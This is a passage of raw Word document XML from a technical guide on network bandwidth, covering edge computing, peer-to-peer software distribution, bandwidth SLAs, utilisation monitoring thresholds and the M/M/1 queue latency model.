          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>HTTP/2 header compression (HPACK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708183D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>gRPC + Protobuf instead of REST + JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96D6F8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Binary protocols instead of text protocols for internal communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1B6C6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="0FB1C403">
          <v:rect id="_x0000_i4380" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D72C3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Bandwidth and Content Delivery Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7078A2D1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Edge Computing — Processing at the Network Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B2622" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bandwidth motivation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C2CA15" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Instead of sending raw data to a central cloud for processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF5867" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Process at the edge (close to the data source).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F39EA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Send only the RESULTS (much smaller) to the cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DD9F52" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IoT example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5535FA68" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>1000 cameras generating 5 Mbps each = 5 Gbps of raw video to the cloud → expensive and slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D45E05" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Edge processing: cameras run object detection locally, send only "person detected at 14:30" events (bytes, not megabytes) → 99.99% bandwidth reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827B16A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN edge compute (Cloudflare Workers, Lambda@Edge):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CE3A47" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Instead of routing API requests to origin (adding latency + bandwidth cost):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739E788D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Execute logic at the edge PoP (millisecond responses, no origin bandwidth needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183B35C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Use cases: A/B testing, geolocation, authentication, personalization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548486E5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Peer-to-Peer Distribution — Scaling Bandwidth Horizontally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B37DB0D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Distributing a 10 GB software update to 1 million machines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB7617" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Centralized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E0748" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A0E19" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin bandwidth: 10 GB × 1,000,000 = 10 PB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BD715" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>At 100 Gbps origin capacity: 10 PB / 100 Gbps = 800,000 seconds = 9.3 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7202A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BitTorrent-style P2P:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799B570" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED25CC9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each machine downloads from multiple peers AND uploads to other peers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E4F5C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin seeds once (10 GB) → first 10 machines get it → now 11 sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7722B5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>After 10 rounds of doubling: 1024 sources → exponential distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B72FE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total time: O(log N) × single-transfer-time = 20 rounds × download_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F729DA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D7725" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Windows Update (BITS with peer caching).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA0C1D8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Docker image distribution (Dragonfly, Kraken — Uber's P2P image distribution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553981E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Software deployment across thousands of servers (BitTorrent-based tools like Murder — Twitter's deployment system).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38DC93" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Live streaming (some P2P CDN solutions use viewers as relay nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1272B797" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="31B94DFB">
          <v:rect id="_x0000_i4381" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9DA92" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Bandwidth Monitoring and SLAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42EE26" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Bandwidth SLAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB72336" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What a network bandwidth SLA guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCEAEBF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CIR (Committed Information Rate):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Guaranteed minimum bandwidth always available (e.g., 500 Mbps guaranteed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312D750" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PIR (Peak Information Rate):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Maximum burst bandwidth allowed (e.g., burst to 1 Gbps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DAF0B4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Percentage of time the CIR is delivered (e.g., 99.99%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50FEA9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet loss:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Maximum acceptable loss rate at CIR (e.g., &lt; 0.01%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244667FF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Monitoring Bandwidth Utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1069DE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key metrics to track:</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748"/>
        <w:gridCol w:w="4160"/>
        <w:gridCol w:w="2442"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="52117FA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BA4762" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metric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515D5B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What It Shows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775555" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Alert Threshold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="795B410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5B51D0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Interface utilization (%)</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5E3CC1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Current bandwidth usage / capacity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4D87B0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&gt; 70% sustained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="457975B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DA9E6E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Packets per second (PPS)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FCC997" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Number of packets (distinct from bandwidth)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CE6159" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Near NIC limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="02830BD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A5B3E9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Errors/drops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F3E7F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Packets lost due to congestion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167494" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Any non-zero sustained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="45E4091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69E1D0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>TCP retransmissions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08D6F0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Lost packets requiring resend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2A6EA9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&gt; 1% of segments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="15FC9AE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3D539A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Network buffer utilization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BD2724" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Queue depth at switches/NICs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937502" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&gt; 50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16CF6D35" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why 70% is the alert threshold (not 100%):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D4333" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>At &gt;70% utilization, TCP congestion events become frequent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6227D72A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Latency increases non-linearly (queueing theory: latency → ∞ as utilization → 100%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7645B8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Burst traffic above 70% sustained causes packet drops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D670E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Need headroom for operational tasks (monitoring, deployments, failover traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73475B4D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The M/M/1 queue model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386834D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A67CADC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average_Latency = Service_Time / (1 - Utilization)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10"/>
        <w:gridCol w:w="2356"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="20CF1FF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DE2200" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Utilization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CB5029" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency Multiplier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="293F73E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0A3639" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>50%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CF0D56" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>2x base latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2854DC2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4E790E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>70%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86C589" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>3.3x base latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="24F6D84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8DDA25" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>80%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F69676" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>5x base latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="129A876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D2EF9C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
